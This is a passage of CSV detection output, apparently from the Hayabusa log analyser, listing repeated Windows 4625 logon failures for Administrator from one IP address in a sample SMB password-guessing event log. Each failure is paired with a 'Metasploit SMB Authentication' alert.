Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXXuUyKlvaOgMNSu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X3qdEQReXwHAZUS8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.904 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FqtfHJKOfmWXEd4s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mVv7vete3uXixggi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0PF6E3wRP0Tk39ss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: touwF4IXUahG7jvJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.106 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lMOi7rygc7SJ5TPQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QjM1K5eFSA9U37oE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HgzyZqFU9v2kDVvG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.258 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hJeVj2h0sBxwBuGv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.301 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FNXI8b6Zcj1zU3JY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.355 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q9DyH9oxFbRTCQ80 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.408 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.458 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5LZo1ljGLOVKhwcC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.458 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GvY6Q7RGKwjehARC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.556 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uKLrHVMevqniTck8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldxglvKFhLJQ3FV3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lRHIAxIj9wFRIg67 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.685 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mc7nvfyDfWpnhhBx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.725 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NB7Y4gPbxose5TsQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yKFU6DJ8Wdtp2qdC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.806 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YlbxRctdClWIOjss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.886 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LToi5ANf3tUteu4h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.886 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 52YPmYviVPBqJ39Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.932 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JpzKsyxEKNLd8l1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.985 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r0vd6xEFevamX3jF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.089 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WR9gJBoN1ra4NI2M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.089 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rGYNVrDBIpMBu9GT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 57qCysbeaXx12CbY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.186 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyJl4mHvgtTv53d9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.229 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGBDZCtot2ogcKIO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.275 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bBhmbqZIi1gX62mM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.305 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o7d4bcBJV1jlRgdt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtfFb6hMHJiFXxai : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: frlsZMDcdb5WaW99 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.441 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CFV8UiUTRCCfab9l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZI8P6ZeVRmQlbGtz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.537 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UmJI7S1nj5hfWZqv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.572 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: veh8XInSzXe8E9UD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a1BuBHLILZ4afwJC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.669 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NN2h7CHnGSCQZXan : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.721 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BU3fxfM1qGBJ55HS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.758 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.802 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1OlBmhUABabDQbN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.802 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6DgQtHG7cT05kRXd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.890 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUTe3JqVWgDcDcOS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.890 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nGKgUOyX3USQlESB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rcIJ8keQvgax1SuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.978 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A7jsyA7bWtVf4sLr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.025 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 